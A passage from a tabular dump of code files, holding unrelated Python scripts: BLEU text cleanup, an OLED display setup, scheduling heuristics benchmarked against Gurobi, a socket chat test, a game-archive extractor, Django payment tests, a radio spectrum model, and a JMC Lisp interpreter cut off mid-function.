index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
10,500 | 31abc49be84b81f0e7ffe4e643737ff587ad8427 | import argparse
from mosestokenizer import *
def de_preprocess(references, language):
    """Strip BPE/markup artefacts from a sequence of tokens.

    references : iterable of token strings.
    language   : kept for interface compatibility; unused here (the Moses
                 detokenizer path is disabled).

    Returns the tokens with the marker substrings removed, dropping any
    token that becomes empty.
    """
    # Markers are removed in this exact order (matters for overlapping "@".
    # runs: "@@@@" never matches after all "@@@" occurrences are gone).
    markers = ("@@@", "@@@@", "<eos>", "@str@@")
    cleaned = []
    for token in references:
        for marker in markers:
            token = token.replace(marker, "")
        if token:
            cleaned.append(token)
    return cleaned
parser = argparse.ArgumentParser(description="Compute BLEU score")
parser.add_argument("--src", type=str, help="path to source file")
parser.add_argument("--out", type=str, help="path to output file")
parser.add_argument("--language", type=str, nargs="?",
                    help="Language of the source translation (needed for tokenizer)")
args = parser.parse_args()

language = args.language
source_file_path = args.src
output_file_path = args.out

# Fix: the original opened the source file inline in the for-loop and never
# closed it; open both files with context managers so both handles are
# released deterministically.
with open(source_file_path, 'r') as source_file, \
        open(output_file_path, 'w') as output_file:
    for line in source_file:
        # Clean each whitespace-separated token and re-join with single spaces.
        clean_line = de_preprocess(line.split(), language)
        output_file.write(" ".join(clean_line) + "\n")
|
10,501 | 3bd4da3d61776d594535599e4b2a51979ab85931 | #!/bin/python3
# import socket
import busio
import adafruit_ssd1306
# from PIL import Image, ImageDraw, ImageFont
# I2C pin numbers for the display bus.
# NOTE(review): busio.I2C(scl, sda) normally takes board pin objects; bare
# ints 1/0 look board-specific — confirm against the target board's docs.
SCL = 1
SDA = 0
# Display dimensions in pixels (128x32 SSD1306 module).
HEIGHT = 32
WIDTH = 128
# Open the I2C bus and bind the SSD1306 OLED driver to it.
i2c = busio.I2C(SCL, SDA)
disp = adafruit_ssd1306.SSD1306_I2C(WIDTH, HEIGHT, i2c)
|
10,502 | 10c3d75c153aa00226466765986d156cb009ec01 | import random
import numpy as np
import copy
import time
from gurobipy import *
import networkx as nx
M = 100000
def phase_1(t):
    """Greedy initial allocation: give each operation (column of t) to the
    agent (row) with the smallest processing time for it.

    t : 2-D array-like of processing times, shape (num_agents, num_ops).

    Returns np.asarray of per-agent lists of operation indices.
    NOTE(review): the per-agent lists are ragged in general; np.asarray on a
    ragged list raises on NumPy >= 1.24 unless dtype=object — confirm callers.
    """
    # Fix: dropped the unused local `p` from the original.
    x = [[] for _ in range(len(t))]
    alloc = np.argmin(t, 0)  # index of the cheapest agent per operation
    for op, agent_idx in enumerate(alloc):
        x[agent_idx].append(op)
    return np.asarray(x)
class agent:
 """One machine/agent in the scheduling game.

 op_times : full vector of this agent's processing times for every operation.
 alloc    : indices of the operations currently assigned to this agent.
 time_arr : processing times corresponding to `alloc`.
 """
 def __init__(self,time_arr):
  # time_arr: per-operation processing times for this agent.
  self.op_times = np.asarray(time_arr)
  self.alloc = []
  self.time_arr = []
 def eval_bundle(self,alloc):
  # Return this agent's processing times for the operations in `alloc`
  # (empty int array for an empty bundle).
  time_arr = np.asarray([]).astype(int)
  if len(alloc) != 0:
   time_arr = self.op_times[np.asarray(alloc)]
  return time_arr
 def allocate(self,alloc):
  # Assign a bundle of operation indices and cache their times.
  self.alloc = np.asarray(alloc).astype(int)
  self.time_arr = self.eval_bundle(self.alloc)
 def total_time(self):
  # Total load (completion time) of this agent's current bundle.
  return sum(self.time_arr)
 def check_deqx(self,agent2):
  # 1 if the pair satisfies the DEQx (single-transfer equilibrium)
  # condition, else 0.
  # NOTE(review): min() on an empty bundle's value array would raise —
  # presumably callers guarantee non-empty bundles; verify.
  v12 = self.eval_bundle(agent2.alloc)
  v21 = agent2.eval_bundle(self.alloc)
  z_11 = sum(self.time_arr)
  z_22 = sum(agent2.time_arr)
  if z_11 + min(v12) >= z_22 and z_22 + min(v21) >= z_11:
   return 1
  else:
   return 0
 def gen_deq1(self,agent2):
  """Pairwise DEQ1 exchange: pool both bundles, sort by the time ratio
  self/other (descending), and move operations from self to agent2 while
  doing so lowers the pair's max load. Returns 1 if the reallocation
  strictly improved the pair makespan, 0 otherwise, -1 if both empty."""
  tot_alloc = np.concatenate((self.alloc,agent2.alloc))
  if len(tot_alloc) == 0:
   return -1
  a1_new_alloc = []
  a2_new_alloc = []
  ratio = []
  # Value of every pooled operation to each of the two agents.
  v11 = self.eval_bundle(tot_alloc)
  v21 = agent2.eval_bundle(tot_alloc)
  v12 = []
  v22 = []
  ratio = v11/v21
  # Operations self is comparatively worst at come first.
  ind = np.argsort(ratio)[::-1]
  v11 = v11[ind]
  v21 = v21[ind]
  a1_new_alloc = tot_alloc[ind]
  # Start with self holding everything, then peel off the front while the
  # pair's max load strictly decreases.
  z1 = np.sum(v11)
  z2 = 0
  for i in range(0,len(a1_new_alloc)):
   if max(z1 - v11[i] , z2 + v21[i]) < max(z1,z2):
    z1 = z1 - v11[i]
    z2 = z2 + v21[i]
    op_trans = a1_new_alloc[0]
    a1_new_alloc = np.delete(a1_new_alloc,0)
    a2_new_alloc = np.append(a2_new_alloc,op_trans)
   else:
    break
  improvement = 0
  #print(max(sum(self.time_arr),sum(agent2.time_arr))," ",max(z1,z2))
  # Commit the new split only on strict improvement of the pair makespan.
  if int(max(sum(self.time_arr),sum(agent2.time_arr))) > int(max(z1,z2)):
   improvement = 1
   self.allocate(a1_new_alloc)
   agent2.allocate(a2_new_alloc)
  return improvement
 def gen_deqx(self,agent2):
  """Pairwise DEQx exchange: repeatedly move the single operation from the
  more loaded agent to the less loaded one that best lowers the pair's max
  load, until no single transfer improves. Returns 1 if anything moved."""
  flag = 0
  improvement = 0
  while flag == 0:
   v12 = self.eval_bundle(agent2.alloc)
   v21 = agent2.eval_bundle(self.alloc)
   z1 = sum(self.time_arr)
   z2 = sum(agent2.time_arr)
   if z1 == 0 and z2 == 0:
    break
   if z1 > z2:
    # Candidate new loads if each of self's operations moved to agent2.
    w1 = z1 - self.time_arr
    w2 = z2 + v21
    z_new = np.maximum(w1,w2)
    ind = np.argmin(z_new)
    if z_new[ind] < max(z1,z2):
     transfer_op = int(self.alloc[ind])
     self.alloc = np.delete(self.alloc,ind)
     self.time_arr = np.delete(self.time_arr,ind)
     agent2.alloc = np.append(agent2.alloc,transfer_op)
     agent2.time_arr = np.append(agent2.time_arr,v21[ind])
     improvement = 1
    else:
     flag = 1
   elif z1 < z2:
    # Symmetric case: move one operation from agent2 to self.
    w2 = z2 - agent2.time_arr
    w1 = z1 + v12
    z_new = np.maximum(w1,w2)
    ind = np.argmin(z_new)
    if z_new[ind] < max(z1,z2):
     transfer_op = int(agent2.alloc[ind])
     agent2.alloc = np.delete(agent2.alloc,ind)
     agent2.time_arr = np.delete(agent2.time_arr,ind)
     self.alloc = np.append(self.alloc,transfer_op)
     self.time_arr = np.append(self.time_arr,v12[ind])
     improvement = 1
    else:
     flag = 1
  return improvement
def calc_makespan(agents):
    """Makespan of the current allocation: the largest total load over agents."""
    return max(a.total_time() for a in agents)
def pairwise_deq1(agents, G):
    """Sweep the DEQ1 exchange over every edge of G until a full sweep makes
    no improvement. Returns the number of sweeps performed."""
    sweeps = 0
    improved = True
    while improved:
        sweeps += 1
        improved = False
        for u, v in G.edges:
            if agents[u].gen_deq1(agents[v]) == 1:
                improved = True
    return sweeps
def op_trading(agents, G):
    """Sweep single-operation transfers (gen_deqx) over every edge of G until
    a full sweep yields no improvement. Returns the number of sweeps."""
    sweeps = 0
    changed = True
    while changed:
        sweeps += 1
        changed = False
        for u, v in G.edges:
            if agents[u].gen_deqx(agents[v]) == 1:
                changed = True
    return sweeps
def find_makespan(t_,G,T,parts,ota_flag):
 """Run one local-search pass over the trading graph G.

 t_       : (m x n) processing-time matrix (not mutated; deep-copied).
 T        : threshold; entries above T get the big-M penalty, forbidding them.
 parts    : initial partition, one list of operation indices per agent.
 ota_flag : "ota" selects single-operation trading, anything else DEQ1.

 Returns (makespan, number of sweeps, resulting partition).
 """
 t = copy.deepcopy(t_)
 # Penalize every processing time above the threshold T.
 t = M*(t>T) + t
 m = len(t)
 n = len(t[0])
 # Build one agent per row and seed it with its initial part.
 agents = []
 for i in range(0,m):
  a = agent(t[i])
  a.allocate(parts[i])
  agents.append(a)
 if ota_flag == "ota":
  num_compares = op_trading(agents,G)
 else:
  num_compares = pairwise_deq1(agents,G)
 makespan = calc_makespan(agents)
 # Collect the final allocation back into a plain partition list.
 parts = []
 for i in range(0,len(agents)):
  parts.append(agents[i].alloc)
 return makespan,num_compares,parts
def run_experiment(m,n,prob,pruning=False,id_flag="nonid"):
 """Run one randomized scheduling experiment and compare against Gurobi.

 m, n    : number of agents and operations.
 prob    : probability of deleting each edge of the complete trading graph.
 pruning : if True, sweep over candidate thresholds and keep the best.
 id_flag : "nonid" independent times, "id" identical rows,
           "prop" rows proportional to a common vector.

 Returns (heuristic_makespan / optimal_makespan, number of sweeps).
 """
 # Random processing times in 1..50 (possibly identical/proportional rows).
 t = np.random.randint(50,size=(m,n))+1
 if id_flag == "id":
  t_ = np.random.randint(50,size=n)+1
  t = []
  for i in range(0,m):
   t.append(copy.deepcopy(t_))
  t = np.asarray(t)
 elif id_flag == "prop":
  t_ = np.random.randint(50,size=n)+1
  t = []
  for i in range(0,m):
   # Per-agent speed factor in [0.5, 1.0).
   f = random.random()*0.5 + 0.5
   t.append(f*copy.deepcopy(t_))
  t = np.asarray(t)
 # Trading graph: complete graph, then drop each edge with probability prob.
 G = nx.Graph()
 G.add_nodes_from(range(m))
 for i in range(0,m):
  for j in range(i+1,m):
   G.add_edge(i,j)
 for e in G.edges:
  r = random.random()
  if r < prob:
   G.remove_edge(*e)
 makespan = -1
 num_compares = -1
 if pruning == False:
  # Random contiguous initial partition of the n operations into m parts.
  items = range(n)
  parts_pos = sorted(random.sample(items,m-1))
  parts = []
  parts.append(list(items[0:parts_pos[0]]))
  for i in range(1,len(parts_pos)):
   parts.append(list(items[parts_pos[i-1]:parts_pos[i]]))
  parts.append(list(items[parts_pos[-1]:]))
  #makespan,num_compares,parts = find_makespan(t,G,np.max(t),parts,"mba")
  # Single pass with no threshold pruning (T = max entry disables penalty).
  makespan,num_compares,parts = find_makespan(t,G,np.max(t),parts,"mba")
 else:
  # Same random contiguous initial partition as above.
  items = range(n)
  parts_pos = sorted(random.sample(items,m-1))
  parts = []
  parts.append(list(items[0:parts_pos[0]]))
  for i in range(1,len(parts_pos)):
   parts.append(list(items[parts_pos[i-1]:parts_pos[i]]))
  parts.append(list(items[parts_pos[-1]:]))
  m_arr = []
  n_iters_arr = []
  # Candidate thresholds: every distinct entry >= the minimum feasible one.
  T_min = max(np.min(t,axis=0))
  thresh_ = t.flatten()
  thresh = []
  for i in range(0,len(thresh_)):
   if thresh_[i] >= T_min and thresh_[i] not in thresh:
    thresh.append(thresh_[i])
  thresh.sort()
  i = 0
  parts_arr = []
  # Re-run the search for every threshold, reusing the previous partition.
  while i < len(thresh) :
   #print(i)
   m_,n_iter,parts = find_makespan(t,G,thresh[i],parts,"mba")
   m_arr.append(m_)
   n_iters_arr.append(n_iter)
   parts_arr.append(copy.deepcopy(parts))
   """
   if len(m_arr) > 2 and m_arr[-1] < M/2:
    if m_arr[-1] > m_arr[-2]:
     break
   """
   i = i + 1
  # Keep the threshold that produced the best makespan.
  ind = np.argmin(m_arr)
  makespan = m_arr[ind]
  num_compares = n_iters_arr[ind]
  parts = parts_arr[ind]
 #makespan,num_compares,parts = find_makespan(t,G,np.max(t),parts,"ota")
 # Exact benchmark: makespan-minimization MIP solved by Gurobi (15s limit).
 mod = Model("mip")
 mod.params.TimeLimit = 15
 phi = mod.addVars(m,n,vtype=GRB.BINARY)
 z_t = mod.addVar(vtype=GRB.CONTINUOUS)
 mod.setObjective(z_t, GRB.MINIMIZE)
 # z_t bounds every agent's load; each operation assigned exactly once.
 mod.addConstrs((z_t >= quicksum((phi[i,j])*t[i,j] for j in range(n)) for i in range(m)))
 mod.addConstrs((quicksum(phi[i,j] for i in range(m)) == 1) for j in range(n))
 mod.optimize()
 opt_makespan = mod.objVal
 return makespan/opt_makespan,num_compares
##################################################################################
# Grid of experiment sizes: agents (m) x operations (n).
m_vals = [2,5,10,20]
n_vals = [25,50,100,200,500]
##################################################################################
# Average approximation ratio and sweep count over 5 runs per (m, n) cell.
record1_makespan = np.zeros((len(m_vals),len(n_vals)))
record1_iters = np.zeros((len(m_vals),len(n_vals)))
for i in range(0,len(m_vals)):
 for j in range(0,len(n_vals)):
  ratios = []
  compares = []
  m = m_vals[i]
  n = n_vals[j]
  for k in range(0,5):
   r,c = run_experiment(m,n,0.0,False,"prop")
   ratios.append(r)
   compares.append(c)
  record1_makespan[i][j] = np.mean(ratios)
  record1_iters[i][j] = np.mean(compares)
# NOTE(review): record1_iters is computed but never written out — confirm
# whether a second savetxt was intended.
np.savetxt('pairwiseMBA_pr_prop_makespan.csv',record1_makespan, delimiter=',')
##################################################################################
"""
record1_makespan = np.zeros((len(m_vals),len(n_vals)))
record1_iters = np.zeros((len(m_vals),len(n_vals)))
for i in range(0,len(m_vals)):
for j in range(0,len(n_vals)):
ratios = []
compares = []
m = m_vals[i]
n = n_vals[j]
for k in range(0,5):
r,c = run_experiment(m,n,0.0,True,"nonid")
ratios.append(r)
compares.append(c)
record1_makespan[i][j] = np.mean(ratios)
record1_iters[i][j] = np.mean(compares)
np.savetxt('pairwiseMBA_prop_pr_makespan.csv',record1_makespan, delimiter=',')
"""
##################################################################################
|
10,503 | 73f630cb865bbd7baa317a853dcfd623cb422ce5 | #******************TESTING***************************
#This file is for testing the enigma_net class
from enigma_net import *
import _thread #used to read messages from inbox
#if you want to test this on two separate computers, change host to '0.0.0.0' on the machine that
#you want to be the server, and change host to '<server's IP>' on the client machine.
#To test the EnigmaNet class on one machine, just set the host variable to 'localhost' and
#run the application twice
host = 'localhost' #the address or hostname of the system you want to connect to.
port = 5555 #the port number you want to use
socktype = int(input("enter sock type 1:server, 2:client: "))
en = EnigmaNet(socktype, host, port)
"""a seperate thread will begin running after calling en.start().
It will read messages in from the socket and place
those messages in an inbox"""
en.start()
user_input = ''
"""I'm using a seperate thread to read the messages in from the inbox.
You don't have to do it this way if you don't want to."""
def readInbox(threadName, delay):
 # Poll the inbox forever; exits when the *global* user_input becomes '-1'.
 # NOTE(review): user_input is read from module scope, so this thread only
 # sees the sentinel after the main loop below reassigns it — confirm that
 # is the intended shutdown mechanism.
 while True:
  if en.have_mail(): #check if there is a message in the inbox
   print (en.recieve_message())#get the message from the inbox and print it
  if user_input == '-1':
   _thread.exit()
_thread.start_new_thread(readInbox, ("ThreadyMcThreadFace", 10))
#getting user input and sending it. the loop will stop if -1 is entered.
while not user_input == '-1':
 user_input = input()
 if user_input == '-1': break
 en.send_message(user_input) #send the message
en.disconnect() #disconnect from the network.
10,504 | e18fd6b29fa77e6792ad7d12cd39b95dfdd3a5ba | '''
Miscellaneous Test Code
Extracts all entries in an Outlaws LAB archive to the current directory.
'''
import struct
import sys
if __name__ == '__main__':
 # Extract every entry of an Outlaws LAB archive into the current directory.
 # Layout: 16-byte header, catalog of 16-byte records, name table, data.
 with open(sys.argv[1], 'rb') as f:
  entries = []  # NOTE(review): unused — confirm it can be removed.
  if f.read(4) != b'LABN':
   print('Bad Magic Identifier')
   exit(-1)
  version = struct.unpack('<I', f.read(4))[0]
  # Only version 0x00010000 is known; warn but continue on mismatch.
  if version != 0x00010000:
   print('Bad Version')
   print('Continuing...')
  num_entries = struct.unpack('<I', f.read(4))[0]
  name_table_length = struct.unpack('<I', f.read(4))[0]
  # Each catalog record: (name offset, data offset, data length, FourCC).
  catalog = []
  for i in range(num_entries):
   offset_name = struct.unpack('<I', f.read(4))[0]
   offset_data = struct.unpack('<I', f.read(4))[0]
   length_data = struct.unpack('<I', f.read(4))[0]
   four_cc = struct.unpack('<I', f.read(4))[0]
   catalog.append((offset_name, offset_data, length_data, four_cc))
  # The name table starts right after the catalog.
  name_table_offset = f.tell()
  names = []
  for i in range(num_entries):
   # Relative seek: the file is positioned at name_table_offset here, so
   # this lands at name_table_offset + the entry's name offset.
   f.seek(catalog[i][0], 1)
   raw_name = b''
   name = ''
   # Read up to the next entry's name (or the end of the table) and cut at
   # the NUL terminator.
   if i < num_entries - 1:
    raw_name = f.read(catalog[i + 1][0] - catalog[i][0])
    name = raw_name[0 : raw_name.index(0)].decode('ascii')
   else:
    raw_name = f.read((name_table_length + name_table_offset) - catalog[i][0])
    name = raw_name[0 : raw_name.index(0)].decode('ascii')
   # Rewind to the start of the name table for the next relative seek.
   f.seek(name_table_offset)
   names.append(name)
  f.seek((name_table_length + name_table_offset))
  # Dump each entry's payload to a file named from the name table.
  for i in range(num_entries):
   entry = catalog[i]
   name = names[i]
   f.seek(entry[1])
   with open(name, 'wb') as e:
    e.write(f.read(entry[2]))
|
10,505 | 3fb468dcb6218fa14a19ea124c9366a387ffebff | from unittest import TestCase
from unittest.mock import patch
from monster import check_monster_encounter
class TestCheck_monster_encounter(TestCase):
    """Tests for monster.check_monster_encounter with the die roll mocked."""

    # Fix: stacked @patch decorators inject mocks bottom-up, so the first
    # mock parameter corresponds to the *lowest* decorator (sud.roll_die).
    # The original parameter names were swapped.
    @patch('monster.monster_encounter', side_effect=[None])
    @patch('sud.roll_die', side_effect=[1])
    def test_monster_encounter_True(self, mock_roll_die, mock_monster_encounter):
        # A roll of 1 triggers an encounter.
        self.assertTrue(check_monster_encounter())

    @patch('sud.roll_die', side_effect=[5])
    def test_monster_encounter_False(self, mock_roll_die):
        # A roll of 5 does not trigger an encounter.
        self.assertFalse(check_monster_encounter())
|
10,506 | 6e469387f05e5225d372e84d6f14a47bad2f2020 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 9 16:01:22 2019
@author: mattcooper
"""
import numpy as np
import matplotlib.pyplot as plt
# Physical constants (SI units unless noted).
u = 1.661e-27        # atomic mass unit [kg]
k = 1.38e-23         # Boltzmann constant [J/K]
c = 3e8              # speed of light [m/s]
m_He = 4.003*u       # helium mass [kg]
m_C = 12.0107*u      # carbon mass [kg]
m_P = 1.673e-27      # proton mass [kg]
T = 10e6             # temperature [K]; rebound to an array later in the script
nu = 10e9            # frequency [Hz]
R_Sun = 6.96e10      # solar radius — presumably in cm (CGS); confirm
h = 6.626e-34        # Planck constant [J*s]
def get_turnover_Freq(n, L, T):
    """Turnover-frequency estimate: n * T**(-3/4) * sqrt(1.24e-2 * L)."""
    scale = np.sqrt(1.24e-2 * L)
    return n * (T ** (-3 / 4)) * scale
#Function derived for the turnover frequency of the surface brightness
def nu_Function(NU, T, L, N_E):
    """Root function for the turnover frequency: zero where the surface
    brightness turns over (see bisect_Function)."""
    coeff = L * .04075 * (N_E ** 2) / (T ** (3 / 2))
    offset = 24.5 + np.log(T)
    return (NU ** 2) + coeff * np.log(NU) - coeff * offset
#Iterative method to solve for the turnover frequency. That darn logarithm
#A and B are the lower and upper bounds of the domain, respectively. Pass any other parameters that may be
#required to compute the function as *args
def bisect_Function(FUNC, A, B, ERR, *args):
    """Find a root of FUNC on [A, B] by bisection.

    A, B  : bracket endpoints (FUNC must change sign on the bracket).
    ERR   : absolute tolerance on the bracket half-width.
    *args : extra arguments forwarded to FUNC.

    Returns the midpoint estimate once the bracket is within ERR, an exact
    zero if one is hit, or None when FUNC has the same value at both bounds
    (matching the original failure behaviour).
    """
    while True:
        M = (A + B) / 2
        func_A = FUNC(A, *args)
        func_B = FUNC(B, *args)
        func_M = FUNC(M, *args)
        if B - M < ERR:
            print('Error reached')
            return M
        if func_A == func_B:
            print('Bisection method failed. Function has same sign at both bounds.')
            return None
        # Bug fix: the original set a flag on an exact zero but still shrank
        # the bracket and then fell out of the loop, returning None. Return
        # the exact root instead.
        if func_A == 0:
            return A
        if func_B == 0:
            return B
        if func_M == 0:
            return M
        # Keep the half-bracket on which the sign change occurs.
        if np.sign(func_A) != np.sign(func_M):
            B = M
        else:
            A = M
# Three atmospheric layers: electron density [cm^-3?], temperature [K] and
# path length; units presumed CGS — confirm against the source formulae.
n_e1 = 10e13
T1 = 1e4
L1 = 1000000
# Extra args map onto nu_Function(NU, T, L, N_E).
nu_Turnover_1 = bisect_Function(nu_Function, 1e8, 1e14, 1e7, T1, L1, n_e1)
n_e2 = 10e10
T2 = 2e6
L2 = 10000000
nu_Turnover_2 = bisect_Function(nu_Function, 1e8, 1e14, 1e7, T2, L2, n_e2)
n_e3 = 10e9
T3 = 5e5
L3 = 70000000
nu_Turnover_3 = bisect_Function(nu_Function, 1e8, 1e14, 1e7, T3, L3, n_e3)
# Frequency grid [Hz]; per-layer optical depth and brightness temperature.
freqs = np.arange(10e6, 10e11, 1e7)
tau = np.zeros([freqs.shape[0], 3])
T = np.zeros([freqs.shape[0], 3])
# NOTE(review): T was just zeroed, so np.log(T) here is -inf everywhere and
# S is never used below — looks like a leftover; confirm it can be removed.
S = 24.5 + np.log(T) - np.log(nu)
for i in range(freqs.shape[0]):
 # NOTE(review): layer 1 uses 18.2 + log(T1**(3/2)) while layers 2 and 3 use
 # 24.5 + log(T) — confirm the inconsistency is intentional.
 tau[i, 0] = (n_e1**2)*(1/T1**(3/2))*L1*1.24e-2*(1/(freqs[i]**(2)))*(18.2 + np.log(T1**(3/2)) - np.log(freqs[i]))
 tau[i, 1] = (n_e2**2)*(1/T2**(3/2))*1.24e-2*(1/(freqs[i]**(2)))*L2*(24.5 + np.log(T2) - np.log(freqs[i]))
 tau[i, 2] = (n_e3**2)*(1/T3**(3/2))*1.24e-2*(1/(freqs[i]**(2)))*L3*(24.5 + np.log(T3) - np.log(freqs[i]))
# Radiative transfer through the stacked layers: each layer attenuates the
# brightness below it and adds its own emission.
T[:,0] = T1*(1-np.exp(-tau[:,0]))
T[:,1] = T[:,0]*np.exp(-tau[:,1]) + T2*(1-np.exp(-tau[:,1]))
T[:,2] = T[:,1]*np.exp(-tau[:,2]) + T3*(1-np.exp(-tau[:,2]))
# Log-log plot of the three layer spectra.
fig1, (ax1) = plt.subplots(1, 1, sharex=True, sharey=False, figsize=(17,12), dpi=166)
ax1.set_yscale('log')
ax1.set_xscale('log')
ax1.plot(freqs, T[:,0], color='black', label='1st Layer Spectra')
ax1.plot(freqs, T[:,1], color='red', label='2nd Layer Spectra')
ax1.plot(freqs, T[:,2], color='blue', label='3rd Layer Spectra')
ax1.set_ylim(1e3, 1e7)
ax1.set_xlim(1e9, 1e11)
ax1.legend()
|
10,507 | 839eb366863737853b832a41632564014328dd4d | # Copyright (c) 2017 Presslabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
from uuid import UUID
from datetime import datetime, timedelta
from mock import patch, MagicMock, call
from django.test import TestCase, override_settings
from django.utils.encoding import force_text
from silver.tests.factories import TransactionFactory
from silver.tests.fixtures import PAYMENT_PROCESSORS
from silver.utils.decorators import get_transaction_from_token
from silver.utils.payments import (get_payment_url, get_payment_complete_url,
_get_jwt_token)
@override_settings(PAYMENT_PROCESSORS=PAYMENT_PROCESSORS)
class TestPaymentsUtilMethods(TestCase):
 """Tests for silver.utils.payments URL helpers and the token decorator."""
 def test_get_payment_url(self):
  # With the JWT helper stubbed, the pay URL embeds the token directly.
  transaction = TransactionFactory()
  expected_url = '/pay/token/'
  with patch('silver.utils.payments._get_jwt_token') as mocked_token:
   mocked_token.return_value = 'token'
   self.assertEqual(get_payment_url(transaction, None), expected_url)
   mocked_token.assert_called_once_with(transaction)
 def test_get_payment_complete_url(self):
  # The complete URL must propagate the caller's return_url query param.
  transaction = TransactionFactory()
  expected_url = '/pay/token/complete?return_url=http://google.com'
  mocked_request = MagicMock(GET={'return_url': 'http://google.com'},
        versioning_scheme=None)
  mocked_request.build_absolute_uri.return_value = '/pay/token/complete'
  with patch('silver.utils.payments._get_jwt_token') as mocked_token:
   mocked_token.return_value = 'token'
   self.assertEqual(get_payment_complete_url(transaction, mocked_request),
        expected_url)
   mocked_token.assert_called_once_with(transaction)
 def test_get_transaction_from_token(self):
  # A fresh token resolves back to the wrapped view call.
  transaction = TransactionFactory()
  mocked_view = MagicMock()
  token = _get_jwt_token(transaction)
  self.assertEqual(get_transaction_from_token(mocked_view)(None, token),
       mocked_view())
  # NOTE(review): Mock has no 'has_calls' assertion — this line creates a
  # child mock and always passes; presumably assert_has_calls was meant.
  mocked_view.has_calls([call(None, transaction, False), call()])
 def test_get_transaction_from_expired_token(self):
  # Issue the token 2 years in the past so it arrives expired.
  transaction = TransactionFactory()
  mocked_view = MagicMock()
  with patch('silver.utils.payments.datetime') as mocked_datetime:
   mocked_datetime.utcnow.return_value = datetime.utcnow() - timedelta(days=2 * 365)
   token = _get_jwt_token(transaction)
  self.assertEqual(get_transaction_from_token(mocked_view)(None, token),
       mocked_view())
  # NOTE(review): same 'has_calls' no-op as above — confirm intent.
  mocked_view.has_calls([call(None, transaction, True), call()])
|
10,508 | 64fe0d4e5ab74f2651eb8fd19762f6fdccd92203 | #
# JMC Lisp: defined in McCarthy's 1960 paper,
# with S-expression input/output and basic list processing
#
# basic list processing: cons, car, cdr, eq, atom
# Cons cells are plain 2-tuples; nil is None; symbols are Python strings.
def cons(x, y): return (x, y)
# car/cdr: head and tail of a cons cell.
def car(s): return s[0]
def cdr(s): return s[1]
# eq: value equality (used for both symbols and nil).
def eq(s1, s2): return s1 == s2
# atom: symbols, nil and the booleans count as atoms; cons cells do not.
def atom(s): return isinstance(s, str) or eq(s, None) or isinstance(s, bool)
# S-expression input: s_read
def s_lex(s):
    """Tokenize an S-expression string: pad the delimiters with spaces and
    split on whitespace."""
    for delim in "()'":
        s = s.replace(delim, " " + delim + " ")
    return s.split()
def s_syn(s):
 """Parse one expression from the token list s, consuming tokens from the
 END of the list (the caller reverses by always popping s[-1]). The list is
 mutated in place, which is why the recursion shares it."""
 def quote(x):
  # If the token just before this expression is a quote mark, wrap the
  # expression as (quote x).
  if len(s) != 0 and s[-1] == "'":
   del s[-1]
   return cons("quote", cons(x, None))
  else: return x
 t = s[-1]
 del s[-1]
 if t == ")":
  # Closing paren first: build the list right-to-left until the matching "(".
  r = None
  while s[-1] != "(":
   if s[-1] == ".":
    # Dotted pair: replace the tail with the car of what we built so far.
    del s[-1]
    r = cons(s_syn(s), car(r))
   else: r = cons(s_syn(s), r)
  del s[-1]
  return quote(r)
 else: return quote(t)
def s_read(s): return s_syn(s_lex(s))
# S-expression output: s_string
def s_strcons(s):
    """Render the interior of a cons chain (no surrounding parentheses)."""
    head = s_string(car(s))
    tail = cdr(s)
    if eq(tail, None):
        return head
    if atom(tail):
        return head + " . " + tail  # improper (dotted) tail
    return head + " " + s_strcons(tail)
def s_string(s):
    """Render a Lisp value as S-expression text: nil -> (), booleans -> t/nil,
    atoms verbatim, cons chains parenthesized."""
    if eq(s, None):
        return "()"
    if eq(s, True):
        return "t"
    if eq(s, False):
        return "nil"
    if atom(s):
        return s
    return "(" + s_strcons(s) + ")"
# JMC Lisp evaluator: s_eval
# Composed accessors, named as in classic Lisp.
def caar(x): return car(car(x))
def cadr(x): return car(cdr(x))
def cadar(x): return car(cdr(car(x)))
def caddr(x): return car(cdr(cdr(x)))
def caddar(x): return car(cdr(cdr(car(x))))
# s_null: true only for nil.
def s_null(x): return eq(x, None)
def s_append(x, y):
 # Append list y to list x (rebuilds x's spine).
 if s_null(x): return y
 else: return cons(car(x), s_append(cdr(x), y))
# s_list: the two-element list (x y).
def s_list(x, y): return cons(x, cons(y, None))
def s_pair(x, y):
 # Zip two equal-length lists into a list of 2-element lists, used to
 # build environment bindings. Returns None once both are exhausted.
 if s_null(x) and s_null(y): return None
 elif (not atom(x)) and (not atom(y)):
  return cons(s_list(car(x), car(y)), s_pair(cdr(x), cdr(y)))
def s_assoc(x, y):
 # Look up symbol x in association list y.
 # NOTE(review): recurses off the end (TypeError) when x is unbound —
 # presumably acceptable for this toy evaluator.
 if eq(caar(y), x): return cadar(y)
 else: return s_assoc(x, cdr(y))
def s_eval(e, a):
 """Evaluate expression e in association-list environment a.

 Implements McCarthy's eval: self-evaluating t/nil, symbol lookup, the
 seven primitives (quote, atom, eq, car, cdr, cons, cond), named-function
 application via environment lookup, and lambda application.
 """
 if eq(e, "t"): return True
 elif eq(e, "nil"): return False
 elif atom(e): return s_assoc(e, a)
 elif atom(car(e)):
  if eq(car(e), "quote"): return cadr(e)
  elif eq(car(e), "atom"): return atom(s_eval(cadr(e), a))
  elif eq(car(e), "eq"): return eq( s_eval(cadr(e), a),
           s_eval(caddr(e), a))
  elif eq(car(e), "car"): return car( s_eval(cadr(e), a))
  elif eq(car(e), "cdr"): return cdr( s_eval(cadr(e), a))
  elif eq(car(e), "cons"): return cons(s_eval(cadr(e), a),
            s_eval(caddr(e), a))
  elif eq(car(e), "cond"): return evcon(cdr(e), a)
  # Named function: substitute its definition from the environment.
  else: return s_eval(cons(s_assoc(car(e), a), cdr(e)), a)
 elif eq(caar(e), "lambda"):
  # ((lambda (params) body) args...): bind params to evaluated args.
  return s_eval(caddar(e),
       s_append(s_pair(cadar(e), evlis(cdr(e), a)), a))
 else: print("Error")
def evcon(c, a):
 # Evaluate cond clauses in order; return the body of the first clause
 # whose test evaluates truthy.
 if s_eval(caar(c), a): return s_eval(cadar(c), a)
 else: return evcon(cdr(c), a)
def evlis(m, a):
 # Evaluate every element of list m, preserving order.
 if s_null(m): return None
